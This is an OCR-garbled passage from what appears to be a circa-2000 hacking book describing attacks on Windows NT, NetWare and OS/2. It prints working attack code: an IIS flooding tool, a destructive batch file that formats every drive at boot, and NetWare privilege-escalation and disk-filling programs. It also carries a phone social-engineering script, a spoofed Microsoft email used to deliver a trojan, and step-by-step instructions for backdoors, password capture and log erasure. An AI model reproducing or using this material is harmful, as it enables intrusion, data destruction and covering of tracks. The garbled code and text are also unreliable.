Hack State: Complete service denial. Vulnerabilities: Win NT.
Breach: Hackers simulate simple telnet procedures to ports 53 and/or 1031 to cause 100 percent CPU utilization, denying all client services and requiring a system restart. Telnetting to an NT server with active ports 53 and/or 1031, and transferring random characters, can cause severe CPU congestion (as shown in Figure 10.8).
This particular attack has made the Underground cloak-and-dagger list, as it has been used to harass countless corporate Web servers, especially those running the domain name service (DNS). Among the obvious DoS side effects, the attack can also cause the system log file to fill up with thousands of error messages, as shown in Figure 10.9.
Severe Denial-of-Service Attack
Synopsis: Custom URL scripts can confuse the Win NT Internet Information Server (IIS) service daemon and cause service denial.
Hack State: Complete service denial.
Vulnerabilities: Win NT IIS, version 3, 4, 5.
Breach: From a Web browser, hackers send custom URL scripts that attack a specific application service, in this case newdsn.exe, resulting in access violation that ultimately crashes the IIS service. Upon execution, the victim may receive the famous Dr. Watson application error with very little resource degradation (as shown in Figure 10.10).
At this point, IIS could immediately crash, or crash upon scheduled administrative service
interruptions—essentially, upon administrative shutdown and/or service restart. The destructive
requests include the following URLs:
www.victim.com/Scripts/Tools/Newdsn.exe7Createdatabase
www.victim.com/Scripts/Tools/Newdsn.exe7Create
Severe Congestion
Synopsis: Custom HTTP request saturation can cause severe resource degradation.
Hack State: CPU congestion.
Vulnerabilities: Win NT 3x, 4, and Internet Information Server version 3, 4, 5.
Breach: Using a simple underground IIS attack software module (see Figure 10.11) that has been programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion, resulting in resource degradation and, ultimately, potential service denial. The program shown here was written in Visual Basic and includes only a single form (see Figure 10.12).
main.frm
Private Stopper&
Private Sub Command1_Click()
On Error GoTo ErrorHandler
If Command1.Caption = "begin" Then
If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a va lid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub Command1.Caption = "stop" Text3.Visible = True For a = 1 To Text2.Text
If Stopper& = 1 Then Exit Sub Do While Inet1.StillExecuting DoEvents
Loop
InetLExecute Text1.Text, "GET " & TextLText Text3.Text = Text3.Text + 1 Next a
Else
Stopper& = 1
Command1.Caption = "begin" Text3.Visible = False
End If Exit Sub ErrorHandler:
MsgBox "Please enter a valid web server!", vbInformation, "" Exit Sub End Sub
System Control
The purpose of this section is to re-create a common system control attack on Win NT servers. Attacks like this one against IT staff happen almost everyday. For simplicity, this hack is broken into a few effortless steps:
Step 1: The Search
In this step, the attacker chooses an IT staff victim. Whether the attacker already knows the victim or searches the victim's company Web site, it takes very little effort to perform some social engineering to reveal a target email address. Remarkably, some sites actually post IT staff support email addresses, and more remarkably, individual names, addresses, and even photos.
This sample social engineering technique was like taking candy from a baby:
Hacker: "Good morning; my name is Joe Hacker from Microsoft. Please transfer me to your IT department. They are expecting my call as I am responding to a support call, ticket number 110158."
Reception: "Oh, okay. Do you have the name of the person you are trying to reach?"
Hacker: "No, sorry... The caller didn't leave a name... wait, let me check... (sound of hacker typing on the keyboard). Nope, only this contact number.''
Reception: "I'll transfer you to Tom; he's in IT. He'll know who to transfer you to."
Tom: "Hello?"
Hacker: "Good morning, Tom; my name is Joe Hacker, from Microsoft support. I'm responding to a support call, ticket number 110158, and I'm making this call to put your staff on our automated NT security alert list."
Tom: "Whom were you trying to reach?"
Hacker: "Our terminals are down this morning; all I have is this contact number. All I need is an IT staff email address to add to our automated NT security alert list. When new patches are available for any substantiated NT vulnerabilities, the recipient will receive updates. Currently, three new patches are available in queue. Also... " (interrupted)
Tom: "Cool; it's a pain trying to keep up with these patches."
Hacker: "It says here your primary Web server is running IIS. Which version is it?"
Tom: "Believe it or not, it's 3.0. We're completely swamped, so we've put this on the back burner. You can use my address for the advisories; it's tom.fooled@victim.com."
Hacker: "Consider it done, ticket closed. Have a nice day."
Step 2: The Alert
During this step, the attacker decides on the remote-control daemon and accompanying message. In this particular case, the attacker chose phAse Zero:
Port: 555, 9989
Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy
Hacker's Strategy: Aside from spy features and file transfer, the most important purpose of these Trojans is to destroy the target system. The only saving grace is that these daemons can only infect a system upon execution of setup programs that need to be run on the host.
Using a mail-spoofing program, as mentioned earlier in this book, the attacker's message arrived (spoofed from Microsoft):
>On 10 Oct 2000, at 18:09, support@microsoft.com wrote:
>
>Issue
>=====
>This vulnerability involves the HTTP GET method, which is used to obtain >information from an IIS Web server. Specially malformed GET requests can >create a denial-of-service situation that consumes all server resources, >causing a server to "hang." In some cases, the server can be put back into >service by stopping and restarting IIS; in others, the server may need to >be rebooted. This situation cannot happen accidentally. The malformed GET >requests must be deliberately constructed and sent to the server. It is >important to note that this vulnerability does not allow data on the >server to be compromised, nor does it allow any privileges on it to be usurped.
>
>Affected Software Versions
>==========================
- Microsoft Internet Information Server, version 3.0 and 4.0, on x86 and >Alpha platforms.
>
>What Customers Should Do
>========================
>The attached patch for this vulnerability is fully supported and should be applied
immediately, as all systems are determined to be at risk of attack. Microsoft recommends >that customers evaluate the degree of risk that this vulnerability poses to their systems, >based on physical accessibility, network, and Internet connectivity, and other factors.
> >
>Obtaining Support on This Issue >===============================
>This is a supported patch. If you have problems installing
>this patch, or require technical assistance with this patch,
>please contact Microsoft Technical Support. For information
>on contacting Microsoft Technical Support, please see
>http://support.microsoft.com/support/contact/default.asp.
>
>
>Revisions
>=========
- October 10, 2000: Bulletin Created
> >
>For additional security-related information about Microsoft products, >please visit http://www.microsoft.com/security
>
>
>
>
>THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
"AS-
>IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER
>EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND >FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT
CORPORATION OR ITS
>SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT,
INDIRECT,
>INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, >EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF
THE
>POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION
OR
>LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
THE
>FOREGOING LIMITATION MAY NOT APPLY.
>
>(c) 2000 Microsoft Corporation. All rights reserved. Terms of Use.
>
>You have received this email bulletin as a result of your registration >to the Microsoft Product Security Notification Service. You may >unsubscribe from this email notification service at any time by sending
>an email to MICROSOFTSECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
>The subject line and message body are not used in processing the request, >and can be anything you like.
>
>For more information on the Microsoft Security Notification Service >please visit http://www.microsoft.com/security/bulletin.htm. For >security-related information about Microsoft products, please visit the >Microsoft Security Advisor Web site at http://www.microsoft.com/security. Step 3: Another Successful Victim
During this step, the attacker simply waits a few days before exercising complete remote control with the phAse zero client, as shown in Figure 10.13.
Miscellaneous Mayhem
Windows 3x, 9x, 2000
Hack State: Hard drive obliteration.
File: HDKill.bat.
Synopsis: Some hackers enjoy generating havoc among their victims. This nasty hard-drive killer, for example, has been attached to countless emails, and distributed with game evaluations as a ReadMe.bat file. In other cases, hackers go to the trouble of breaking into systems only to add this file to the system bootup process. Careful inspection of the code will reveal its purpose.
Hdkill.bat
@echo off
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS... call attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat call attrib +r +h c:\autoexec.bat >nul
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol $b find "Vol" > nul >
(tj.bat
%comspec% /e:2048 /c (tj.bat >>drivechk.bat del (tj.bat
echo if errorlevel 1 goto enddc >>drivechk.bat cls
echo PLEASE WAIT WHILE PROGRAM LOADS.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-
p $b find "bytes" > nul >(tj.bat
%comspec% /e:2048 /c (tj.bat >>drivechk.bat
del (tj.bat
echo if errorlevel 1 goto enddc >>drivechk.bat cls
echo PLEASE WAIT WHILE PROGRAM LOADS.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >(tj.bat %comspec% /e:2048 /c (tj.bat >>drivechk.bat del (tj.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat cls
echo PLEASE WAIT WHILE PROGRAM LOADS.
echo :enddc >>drivechk.bat :testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco vers your system... >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest > nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco vers
your system... >>c:\autoexec.bat echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul
>>c:\autoexec.bat echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco vers
your system... >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul
>>c:\autoexec.bat echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco vers
your system... >>c:\autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest > nul
>>c:\autoexec.bat echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco vers
your system... >>c:\autoexec.bat echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul
>>c:\autoexec.bat echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco vers
your system... >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul
>>c:\autoexec.bat echo cd\ >>c:\autoexec.bat echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard
Drive Killer version 4.0. >>c:\autoexec.bat echo echo If you ran this file, then sorry, I just made it. The pur pose
of this program is to tell you the following... >>c:\autoexec.bat echo echo 1. To make people aware that security should not be taken for
granted. >>c:\autoexec.bat echo echo 2. Love is important, if you have it, truly, don't let go
of
it like I did! >>c:\autoexec.bat echo echo 3. If you are NOT a vegetarian, then you are a murderer, and
I'm glad your HD is dead. >>c:\autoexec.bat echo echo 4. If you are Australian, I feel sorry for you, accept my
sympathy, you retard. >>c:\autoexec.bat echo echo 5. Don't support the following: War, Racism, Drugs and th e
Liberal Party.>>c:\autoexec.bat echo echo. >>c:\autoexec.bat echo echo Regards, >>c:\autoexec.bat echo echo. >>c:\autoexec.bat echo echo Munga Bunga >>c:\autoexec.bat call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul echo @echo off >c:\temp.bat echo >>c:\temp.bat echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul
cd
%%2") do %%%%a >>c:\temp.bat echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole !!!!
>>c:\temp.bat echo if not exist
3-9-1 • \ 9-9-0\9-9-0\ 9-9-0\9-9-0\ 9- 9- O \ 9-9-0\9-9-0\ 9-9-0\9-9-0\ 9- 9- O \ 9- 9- O \ 9- 9- O \ 9-9-0\9-9-0\ 9- 9- O \ oo-L.\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\
a a o \ a o o Z \ c
9- O \ 9- 9- O \ 9-9-0\9-9-0\ 9-9-0\9-9-0\ 9-9-0\9-9-0\ 9- 9- O \ 9-9-0\9-9-0\ 9-9-0\9-9-0\ 9-9-0\9-9-0\ 9- 9- O \ 9-9 oZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\ooZ\oc
2\%%2
\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat call attrib +r +h c:\temp.bat >nul cls
echo Initializing Variables...
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul cls
echo Initializing Variables. echo Validating Data.
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul cls
echo Initializing Variables.
echo Validating Data.
echo Analyzing System Structure...
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul call attrib +r +h c:\temp.bat >nul call attrib +r +h c:\autoexec.bat >nul cls
echo Initializing Variables. echo Validating Data. echo Analyzing System Structure. echo Initializing Application.
for %%a in (%drive%) call deltree /y %%a:\*. >nul cls
echo Initializing Variables. echo Validating Data. echo Analyzing System Structure. echo Initializing Application. echo Starting Application.
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul cls
echo Thank you for using a Munga Bunga product. echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good
looking genius. echo.
echo Here is a joke for you.
echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
:end
Hack State: Password theft. File: ProgenicMail.zip.
Synopsis: Hackers use the ProgenicMail technique to dupe victims into sending all cached system passwords. The program operates in a simple fashion, better explained on a per-file basis:
• Psetup.dat. This file contains the custom configurations options: [Setup]
Mail=(email address to forward passwords to)
Data=ProgenicMail (if left blank, the program will send passwords upon each execution)
• setup.dl. This file can be replaced with any .exe to be loaded to hide the true purpose of the attack. For example, the attacker may rename a joke.exe as setup.dll. The program will then launch setup.dll (really joke.exe) as it forwards all system passwords to the attacker.
Hack State: Unrecoverable file deletion.
File: FFK.exe.
Synopsis: After penetrating a system, hackers will attempt to delete logs and trace back evidence with an unrecoverable file deletion utility. The purpose of this program, by PhrozeN, is to permanently delete files very fast. For example, with Fast File Killer (shown in Figure 10.14), 4,000 files of 3-150 KB take
Ј ..nPhrozeN-f Fast
Fast File Killer
Status: Idle...
■ e [HP_PAV1L»CN| fl
»C;\ ftJohnnyC ft my ■: ft H Toolbox ft soijfce ft archive
Destroy Fie
Why use (his?
1 Kill All Fies f
ConFustornip tekedel zip
tekefmf.zip
lakeid.zip
fakevlrus.zip
forties; 101. zip
gjf hide, sip htdkp4.zip index, him
all Progenic Warfare Members
Figure 10.14 Fast File Killer in action.
5000 failed attempts in 13 ms
usage: nttrack [/n-name] /u=user /p=password (/c=faitcount] |/debijg|
Figure 10.15 Password cracking with NTCrack.
only about 30-60 seconds to delete, and the action all takes place in the background while performing other tasks. These utilities are typically coded to completely remove files with numerous deletions or by scrambling.
Windows NT
Hack State: Brute-force password cracking.
File: NTCrack.exe.
Synopsis: NTCrack is a common Underground password cracker for NT. Operating remotely or locally, an attacker can port custom dictionaries on behalf of the attempted login username and/or password. What's unique with this particular tool is the speed at which simulated logons can be attempted (see Figure 10.15).
Hack State: Administrative privileges exploitation.
File: NTAdmin.exe.
Synopsis: Local attackers exploit vulnerable NT guest accounts with NTAdmin. This Underground enigma has been coded to modify general user/guest accounts on an NT domain to acquire privileged administrative rights. The captures shown in Figure 10.16, before and after the exploit, illustrate the group modifications from guests to administrators.
Other Exposure
This section concludes with a compilation of Underground Microsoft NT hack attacks.
Hacker's This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.
Two accounts typically come with NT: administrator and guest. In numerous network environments, unpassworded admin and guest accounts have been unveiled. It is possible, however, that the system administrator has renamed the administrator account. Hackers know that by typing "NBTSTAT-A ipaddress" reveals the new administrator account.
Passwords
Accessing the password file. The location of the NT security database is located in \\WINNT\SYSTEM32\CONFIG\SAM. By default, the SAM is readable, but locked since it is in use by system components. It is possible, however, that there are SAM.SAV files that could be read to obtain password information.
More on cracking passwords. A standard Windows NT password is derived by converting the user's password to Unicode, then using MD4 to get a 16-byte value; the hash value is the actual NT "password.'' In order to crack NT passwords, the username and the corresponding one-way hashes need to be extracted from the password database. This process can be painless, by using hacker/programmer Jeremy Allison's PWDUMP, coupled with a password-cracking program as defined earlier in this chapter.
From the Console
• Information gathering. From the console on a domain controller, hackers use the following simple steps to get a list of accounts on the target machine. With a list of user accounts, they can target individual attacks:
From the User Manager, create a trusting relationship with the target.
Launch NT Explorer, and right-click on any folder.
Select Sharing.
From the Shared window, select Add.
From the Add menu, select the target NT server. This will reveal the entire group listing of the target.
6. Select Show Users to see the entire user listing, including full names and descriptions.
Novell NetWare
Novell, Inc. (www.novell.com) is a leading provider of system operation software for all types of corporate and private networks including intranets, extranets, and the Internet. Quickly climbing the corporate usage ladder since 1983, Novell NetWare currently is being used in 81 percent of Fortune 500 companies in the United States (according to Harte Hanks Market Intelligence). The company boasts greater security provision throughout the Net while accelerating e-business transformations.
Liabilities
Getting In
Hacking the Console
Synopsis: Simple techniques can facilitate console breaches. Hack State: Administrative privileges exploitation. Vulnerabilities: All flavors prior to version 4.11.
Breach: When NetWare administrators load NetWare loadable modules (NLMs) remote.nlm and rspx.nlm, hackers seek a program titled rconsole.exe, typically from the //public directory. At this point, and on the same address scheme as the administrator and/or target server, the hacker loads an IPX packet sniffer and waits to capture the system password. Among hackers, a popular sniffer package is SpyNet (Chapter 8 describes this package more fully). If the attacker wants to conceal evidence of the hack, he or she erases the system log from //etc/console.log by unloading and reloading the conlog.nlm. This starts a new log capture file over the old one, which contains the evidence.
Stealing Supervisory Rights
Synopsis: Custom coding can modify a standard login account to have supervisor equivalence. Hack State: Administrative privileges exploitation. Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.
Breach: The tempting challenge of any local hacker on a Novell network is to gain supervisory rights. Crack98.c by renowned hacker Mnemonic sets the connection to 0 for supervisor, then creates a user object in the bindery, which must have an equivalent property. At that point, the program adds supervisor equivalent to the supervisor equivalence property, which gives the account supervisor
status.
Crack98.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
main(int
argc, char *argv[])
(
long task; char *account
printf("Crack 98 written by Mnemonic\n"); task = SetCurrentTask(-1L); SetCurrentConnection(0); account = argv[1]; while (argc > 1)
(
if (CreateBinderyObject(name, OT_USER, BF_STATIC, 0x31) == 0)
printf("The account %s has been created\n", account);
else
printf("The account %s already exists on the network\n", account); CreateProperty(account, OUT_USER, "SECURITY_EQUALS", BF_STATIC | BF
_SET, 0x32);
if (AddBinderyObjectToSet(account, OT_USER, "SECURITY_EQUALS", "SUPERVISOR", OT_USER) == 0)
printf("The account %s has been made supervisor equivalent\n", acco
unt);
else
printf("The account is already supervisor equivalent\n");
j
printf("You must enter an account name\n"); account = argv[1];
j
ReturnBlockOfTasks(&task, 1L); ReturnConnection(GetCurrentConnection()); return 0;
j
Unveiling Passwords
Synopsis: Inside and local hackers can attempt to reveal common passwords. Hack State: Password theft.
Vulnerabilities: All flavors prior to 4.1.
Breach: NetCrack (Figure 10.17) by Jim O'Kane is a program by which, through repeated "demon dialer" calls to the VERIFYPASSWORD function in NetWare's Bindery commands, NetCrack.exe attempts to divulge user passwords using legal queries.
Format: NETCRACK
Common user accounts in NetWare and affiliated hardware partners include:
LASER
HPLASER
WANGTEK FAX
FAXUSER
HetCract vers-ion 1.D i::vj!Miiiiimi)^i.i,il,\ii.iiiu;n n,u,,
UARH1HG:
This program is attempting to find out the password of User:JCH1RILL0 !
' [iJl-M 111 ll'tl*
PHESS AHV KEV TO DISCOHTIHUE StflHCH
Figure 10.17 Hacking with NetCrack.
PRINTER
LASERWRITER
POST
GATEWAY
GATE
ROUTER
BACKUP
ARCHIVIST
CHEYARCHSVR WINDOWSPASSTHRU
ROOT
WINSABRE
SUPERVISOR
System Control Backdoor Installation
Synopsis: After gaining administrative access, hackers follow a few simple steps to install a backdoor.
Hack State: Remote control.
Vulnerabilities: NetWare NDS.
Breach: After gaining access control to the NetWare O/S, hackers attempt to install a remote-control backdoor that may go unnoticed for some time. There are six simple steps to initiate this process:
In NWADMIN, highlight an existing container.
Create a new container inside this container.
Create a user inside this new container.
Allow full trustee rights to this user's own user object.
Allow this user full trustee rights to the new container.
Give this user supervisory equivalence.
Modify the Access Control List (ACL) for the new user so that he or she cannot be seen.
Adjust the Inherit Rights Filter on the new container so it cannot be seen.
Place the new container in the IT group container to install the backdoor and to enable its login to show up in the normal tools that show active connections.
Locking Files
Synopsis: Inside and local hackers can wreak havoc by modifying file usability. Hack State: File control.
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.
Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files. This hack attack, associated with a program called Bastard by The Grenadier (Underground hacker/programmer) (Figure 10.18), is popular among disgruntled employees. Basically, upon execution, the program simply asks for the path to a file for lockdown modifications. At that point, no other user can open the file for use until the attacker closes Bastard.exe, logs off, or shuts down. Essentially, when critical O/S operational files fall victim to this exploit, this brings networks to their knees. The program is almost too simple to use: the only requirement is that the attacker have Read access to the target file.
Figure 10.18 Locking files with Bastard. Miscellaneous Mayhem Disappearing Disk Usage
Synopsis: Hackers can crash hard drives by filling up all available space.
Hack State: System crash. Vulnerabilities: NetWare 2/3.
Breach: Burn.c by the infamous hacker, Jitsu-Disk depletes available disk space by erroneously filling up an error log file at the rate of 1 MB per minute. Remnants of this particular attack may be found on many older NetWare systems. Apparently, the attacker does not have to be logged in to execute this utility.
Burn.c
#include
typedef unsigned int uint8;
int shreq(int f, uint8 *req, int rl, uint8 *ans, int al)
(
union REGS r;
r.w.cx=rl;
r.w.dx=al;
r.w.si=((unsigned)(req)); r.w.di=((unsigned)(ans));
r.w.ax=0xf200|f;
int86(0x21,&r,&r);
j
int setconn(int c) /* connect to first server */
(
union REGS r;
r.w.ax=0xf000; /* set preferred connection nr */
r.w.dx=c+1;
int86(0x21,&r,&r);
return(r.w.ax&0xff);
j
/*
* Main prog */
int main() ( int err;
uint8 *nonsense=(uint8 *)calloc(1,sizeof(uint8)*128); err=setconn(0);
for(;;) shreq(74,nonsense,5,nonsense,0);
j
Other Exposure
This section concludes with a compilation of Underground Novell NetWare hack attacks.
This section was prepared with help from the Nomad Mobile Research Centre Kate*'* (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.
Accounts
Distinguishing valid account names on Novell NetWare. Any limited account should have enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory. Once in, type SYSCON and enter. Go to User Information to see a list of all defined accounts. You will not see much information with a limited account, but you can get the account and the user's full name. If you're in with any validity, you can run USERLST.EXE and get a list of all valid accounts on the server.
What if you don't have access? In this case, you can't try just any account name at the LOGIN prompt. It will ask you for a password, whether the account name is valid or not; and if it is valid and you guess the wrong password, you could be letting the administrators know what you're up to if Intruder Detection is on.
To determine whether an account is valid, from a DOS prompt, use a local copy of MAP.EXE. After you've loaded the NetWare TSRs up through NETX or VLM, try to map a drive using the server name and volume SYS, for example:
MAP G:=TARGET_SERVER/SYS:APPS
Since you are not really logged in, you will be prompted for a login ID. If it is a valid ID, you will be prompted for a password. If not, you will immediately receive an error. Of course, if there is no password for the ID you chose to use, you will be attached and mapped to the server.
• You can do the same thing with ATTACH.EXE: ATTACH TARGETSERVER/loginidtotry
Again, if this is valid, you will be prompted for a password, if not you'll get an error.
Other means to obtain supervisor access. This technique is most effective in NetWare version 3.11 When the Supervisor is logged in, a program called NW-HACK.EXE does the following:
The Supervisor password is changed to SUPER_HACKER.
Every account on the server is modified as supervisor equivalent
Leaving a backdoor open, redux. When hackers have access to a system, they want a way back in that has supervisor equivalency. You can use SUPER.EXE, written for the express purpose of allowing the nonsupervisor user to toggle on and off supervisor equivalency. If you used NW-Hack to obtain access, you can turn on the toggle before the administrator removes your supervisory equivalency. If you gain access to a supervisor-equivalent account, give the guest account super equivalency, then log in as Guest and toggle it on as well. At this point, get back in as the original supervisor account, and remove the supervisor equivalency. Now Guest can toggle on supervisor equivalency whenever convenient.
Getting supervisor access, redux. If you have two volumes or some unallocated disk space, you can use this hack to get supervisor access:
Dismount all volumes.
Rename SYS: to SYSOLD:.
Rename VOL1: (or equivalent) to SYS:; or just create a new SYS: on a new disk.
Reboot the server.
Mount SYS: and SYSOLD:.
Attach to the server as Supervisor (note: login not available).
Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD.
Dismount volumes.
Rename volumes back to the correct names.
Reboot the server again.
Log in as Supervisor, this time with no password.
Run BINDREST.
At this point, you should be logged in as the supervisor. With these privileges, you can create a new user as supervisor-equivalent, then use this new user to reset the supervisor's password.
Passwords
• Accessing the password file. When accessing the password file in NetWare, all objects and their properties are kept in the bindery files in versions 2x and 3x, and in the NDS database in version 4.x. An example of an object might be a printer, a group, an individual's account, and so on. An example of an object's properties might include an account's password or full username, a group's member list, or full name. The bindery file's attributes (or flags) in versions 2x and 3x are denoted as Hidden and System. These files are located on the SYS: volume in the SYSTEM subdirectory as follows:
Version 2x: NET$BIND.SYS, NET$BVAL.SYS
Version 3x: NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
NET$BVAL.SYS and NET$VAL.SYS are the actual storage locations for passwords in versions 2x and 3x, respectively. In version 4.x, however, the files are physically located in a different location. By using the RCONSOLE utility and Scan Directory option, you can see the files in SYS: NETWARE:
VALUE.NDS: Part of NDS
BLOCK.NDS: Part of NDS ENTRY.NDS: Part of NDS
PARTITIO.NDS: Type of NDS partition
MLS.000: License
VALLINCEN.DAT: License validation
More on cracking passwords. As with most insecure LANs, for purposes of this discussion, we'll assume that Intruder Detection is turned off and that unencrypted passwords are allowed. If you have access to the console, either by standing in front of it or via RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM, or SETPWD.NLM to reset passwords simply by loading the NLM and passing command-line parameters:
NLM
SETSPASS.NLM
SETSPWD.NLM SETPWD.NLM
ACCOUNT(S) RESET
Supervisor Supervisor Any valid account
3x
3x, 4x 3x, 4x
If you can plant a password catcher or keystroke reader, you can get access to them with LOGIN.EXE, located in the SYS:LOGIN directory. The best place to put a keystroke capture program is in the workstation's path, with the ATTRIB set as hidden. The advantage to that action is that you'll capture the password without NetWare knowing about it. An alternative is to replace LOGIN.EXE by the itsme program. This program, coupled with PROP.EXE, will create a separate property in the bindery on a version 2x or 3x server that contains the passwords. Here are the steps to perform when using these tools:
Gain access to a workstation logged in as Supervisor or equivalent (or use another technique, as described elsewhere).
Run the PROP.EXE file with a -C option. This creates the new property for each bindery object.
Replace the LOGIN.EXE in the SYS:LOGIN directory with the itsme version.
Keep PROP.EXE on a floppy, and check the server with any valid login after a few days.
To check for captured passwords, type PROP -R after logging in. This can be redirected to a file or printer.
Accounting and Logging
• Defeating accounting. Accounting is Novell's technique for controlling and managing access to the server. The admin setup rates are based on blocks read and written, service requests, connect time, and disk storage. The account "pays" for the service by being given some number, and the accounting server deducts for these items. Any valid account, including nonsupervisor accounts, can check to see if Accounting is active simply by running SYSCON and attempting to access Accounting.
To defeat Accounting, you must turn it off by taking three simple steps:
1. Spoof your address. This will depend on the network interface card (NIC); typically, you can do it in the Link Driver section of the NET.CFG file by adding the following line:
NODE ADDRESS xxxxxxxxxxxx
where xxxxxxxxxxxx is the 12-digit MAC layer address.
If you are using a backdoor, activate it with SUPER.EXE.
Delete Accounting by running SYSCON, then selecting Accounting, Accounting Servers, and hitting the Delete key. The last entry in the NET$ACCT.DAT file will be your login, time-stamped with the spoofed node address.
Defeating logging. These steps require console and Supervisor access:
Type MODULES at the console. Look for the CONLOG.NLM to verify active logging.
Look on the server in SYS:ETC for a file called CONSOLE.LOG, a plain text file that you can edit, though not while CONLOG is running.
Unload CONLOG at the console.
Delete or edit the CONSOLE.LOG file to erase track evidence.
Reload CONLOG.
Check the CONSOLE.LOG file to ensure the owner has not changed.
Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG.
Files and Directories
Viewing hidden files. Use NDIR to see hidden files and directories: NDIR *.* /S /H.
Defeating the execute-only flag. If a file is flagged as execute-only, it can still be opened. Try opening the file with a program that will read in executables, and perform a Save As (to another location).
Editing login scripts. Login scripts are stored in SYS:_NETWARE. Unlike the binary files used in NDS, these files are completely editable by using EDIT.NLM. Performing an RCONSOLE directory scan in SYS:_NETWARE will turn up files with extensions such as .000, which are probably login scripts. For example, suppose you found 00021440.000:
LOAD EDIT SYS:_NETWARE\0002144 0.000
If it's a login script, you'll be able to edit and save it. This completely bypasses NDS security, and is the main weakness here. As a result, you can use this to grant a user extra rights that can lead to a number of compromises, including full access to the file system of any server in the tree.
OS/2
With excellent ratings and customer feedback, it's a mystery why this operating system hasn't made its way to take greater predominance. IBM's OS/2 (/www-4.ibm.com/software/os/warp) had compatibility and stability problems until version 2.0 released in 1992. Since the addition of a new object-oriented GUI, stable DOS compatibility, and resilient Windows software compatibility, OS/2 sales have been steadily growing. IBM's recent release, version 4, comes standard with all of the bells and whistles deemed necessary by consumers. The OS/2 System folder contains all the tools necessary to manage a PC, from folder templates to the desktop schemes with drag-and-drop fonts and colors. And connectivity configuration is a walk in the park from the Internet, file/print servers to peer networks (see Figure 10.19).
Liabilities
Tunneling
Hack State: Security perimeter bypass for unauthorized access.
Synopsis: Defense perimeter tunnel attack through firewall and/or proxy.
Vulnerabilities: All flavors.
Breach: Excerpt from Os2tunnel/http.c.
Os2tunnel/http.c
#include
